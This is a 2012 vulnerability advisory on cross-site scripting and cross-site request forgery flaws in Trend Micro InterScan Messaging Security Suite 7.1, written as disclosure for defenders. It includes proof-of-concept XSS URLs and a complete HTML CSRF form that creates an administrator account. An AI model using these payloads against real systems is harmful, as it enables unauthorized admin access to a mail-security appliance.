Vulnerability Note VU#471364

Trend Micro InterScan Messaging Security Suite is vulnerable to XSS and CSRF vulnerabilities

Original Release date: 13 Sep 2012 | Last revised: 14 Sep 2012

Overview

Trend Micro InterScan Messaging Security Suite Version 7.1-Build_Win32_1394 has been reported to be susceptible to cross-site scripting and cross-site request forgery vulnerabilities.

Description

Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) and cross-site request forgery (CWE-352) vulnerabilities.

Cross-site scripting (CVE-2012-2995) (CWE-79)
Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

Cross-site request forgery (CVE-2012-2996) (CWE-352)
CSRF add admin privilege account
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra&#46;123" />
<input type="hidden" name="confirmPwd" value="quorra&#46;123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

Impact

An unauthenticated attacker may be able to execute arbitrary script in the context of a logged in user's session.

Solution

We are currently unaware of a practical solution to this problem. Please consider the following workarounds.

Restrict access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from accessing the InterScan Messaging Security Suite using stolen credentials from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Trend MicroAffected10 Aug 201212 Sep 2012
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group Score Vector
Base 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P
Temporal 5.5 E:POC/RL:U/RC:UC
Environmental 5.5 CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

Credit

Thanks to Tom Gregory for reporting this vulnerability.

This document was written by Jared Allar.

Other Information

  • CVE IDs: CVE-2012-2995 CVE-2012-2996
  • Date Public: 13 Sep 2012
  • Date First Published: 13 Sep 2012
  • Date Last Updated: 14 Sep 2012
  • Document Revision: 14

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.